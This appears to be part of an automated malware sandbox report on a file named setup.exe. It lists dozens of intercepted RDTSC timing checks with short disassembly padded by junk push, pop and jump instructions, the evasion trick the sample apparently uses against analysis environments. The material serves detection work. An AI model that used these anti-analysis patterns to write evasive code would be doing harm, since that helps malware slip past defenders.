                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE9AB3 second address: EE9AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FE0B4522B16h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE9AC2 second address: EE9AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE9D63 second address: EE9D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FE0B4522B16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE9D6F second address: EE9D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE9D7A second address: EE9D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE9EE1 second address: EE9EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE9EE5 second address: EE9EE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EE9EE9 second address: EE9EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EEA456 second address: EEA45A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EEA5AF second address: EEA5D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE0B4F44DD5h 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF2548 second address: EF2558 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FE0B4522B16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF2558 second address: EF2582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FE0B4F44DC6h 0x0000000a jmp 00007FE0B4F44DD5h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007FE0B4F44DC6h 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF285C second address: EF2878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FE0B4522B21h 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF2878 second address: EF287E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF287E second address: EF2884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF2884 second address: EF2888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF29CE second address: EF29D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF2B5E second address: EF2B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FE0B4F44DC6h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF2CFF second address: EF2D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF1B7A second address: EF1B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jmp 00007FE0B4F44DCAh 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF7748 second address: EF774C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF774C second address: EF776A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FE0B4F44DCAh 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007FE0B4F44DC6h 0x00000014 jl 00007FE0B4F44DC6h 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF776A second address: EF776E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EF776E second address: EF779D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jbe 00007FE0B4F44DC6h 0x00000011 popad 0x00000012 push ebx 0x00000013 jmp 00007FE0B4F44DD6h 0x00000018 pushad 0x00000019 popad 0x0000001a pop ebx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: EFC07C second address: EFC082 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F0F031 second address: F0F035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3FEA8 second address: E3FEC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FE0B4522B16h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3FEC4 second address: E3FEC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3FEC8 second address: E3FECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E3FECE second address: E3FEEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE0B4F44DD5h 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F1AF72 second address: F1AF76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F1AF76 second address: F1AF7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F21CB9 second address: F21CC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F21CC8 second address: F21CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F21CCE second address: F21D0A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE0B4522B3Fh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007FE0B4522B16h 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F21D0A second address: F21D14 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F21D14 second address: F21D38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B21h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jp 00007FE0B4522B16h 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F21D38 second address: F21D41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F21EB6 second address: F21EC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F21EC1 second address: F21EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F21EC5 second address: F21EDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F21EDC second address: F21EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F222FA second address: F2231F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B28h 0x00000007 ja 00007FE0B4522B16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F2231F second address: F22327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F22327 second address: F2232C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F2232C second address: F22343 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FE0B4F44DC6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jbe 00007FE0B4F44DC6h 0x00000011 push eax 0x00000012 pop eax 0x00000013 popad 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F22677 second address: F2267C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F2267C second address: F22682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F22682 second address: F2268C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FE0B4522B16h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F22818 second address: F2284F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE0B4F44DC6h 0x00000008 jmp 00007FE0B4F44DD2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnc 00007FE0B4F44DD2h 0x00000015 jmp 00007FE0B4F44DCAh 0x0000001a push edi 0x0000001b pop edi 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F2284F second address: F22863 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jc 00007FE0B4522B16h 0x0000000d jg 00007FE0B4522B16h 0x00000013 pop esi 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F26DF3 second address: F26E07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jg 00007FE0B4F44DC6h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007FE0B4F44DC6h 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E44F34 second address: E44F3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E44F3A second address: E44F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FE0B4F44DC6h 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E44F48 second address: E44F4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: E44F4C second address: E44F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F26962 second address: F26970 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FE0B4522B18h 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F26970 second address: F26983 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnl 00007FE0B4F44DC6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F26983 second address: F26989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F26989 second address: F2698E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F2698E second address: F26994 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F26B10 second address: F26B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FE0B4F44DD4h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F26B2D second address: F26B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F26B33 second address: F26B37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F26B37 second address: F26B4F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE0B4522B16h 0x00000008 jbe 00007FE0B4522B16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007FE0B4522B16h 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F31F09 second address: F31F0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F31F0D second address: F31F11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F45E15 second address: F45E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0B4F44DD4h 0x00000009 pushad 0x0000000a popad 0x0000000b jp 00007FE0B4F44DC6h 0x00000011 popad 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F45E36 second address: F45E49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F45CAC second address: F45CB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F61915 second address: F6191A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F6191A second address: F61937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE0B4F44DD3h 0x00000009 jnl 00007FE0B4F44DC6h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F61937 second address: F6193B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F6193B second address: F61941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F606E0 second address: F606E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F60A28 second address: F60A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F60A2E second address: F60A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FE0B4522B1Ah 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FE0B4522B25h 0x00000012 pop edi 0x00000013 pushad 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F60A5B second address: F60A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0B4F44DCFh 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F60D3A second address: F60D4A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jns 00007FE0B4522B16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F60D4A second address: F60D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0B4F44DD8h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F60D66 second address: F60D70 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F611C6 second address: F611CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F611CC second address: F611D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F611D7 second address: F611DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F63036 second address: F6303A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F688B1 second address: F688D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jnp 00007FE0B4F44DD7h 0x0000000e jmp 00007FE0B4F44DD1h 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: F6896E second address: F68985 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jbe 00007FE0B4522B16h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A0728 second address: 47A0740 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE0B4F44DD4h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A0740 second address: 47A0777 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and esp, FFFFFFF8h 0x0000000b jmp 00007FE0B4522B27h 0x00000010 xchg eax, ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FE0B4522B20h 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A0777 second address: 47A077D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A077D second address: 47A079F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 5583h 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FE0B4522B21h 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A079F second address: 47A07A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A07A5 second address: 47A07CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FE0B4522B20h 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A07CD second address: 47A07D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A07D1 second address: 47A07D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A07D7 second address: 47A080E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4F44DD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FE0B4F44DCBh 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 call 00007FE0B4F44DCBh 0x00000018 pop eax 0x00000019 mov ah, dh 0x0000001b popad 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A080E second address: 47A0837 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0B4522B1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE0B4522B25h 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47A0837 second address: 47A083D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
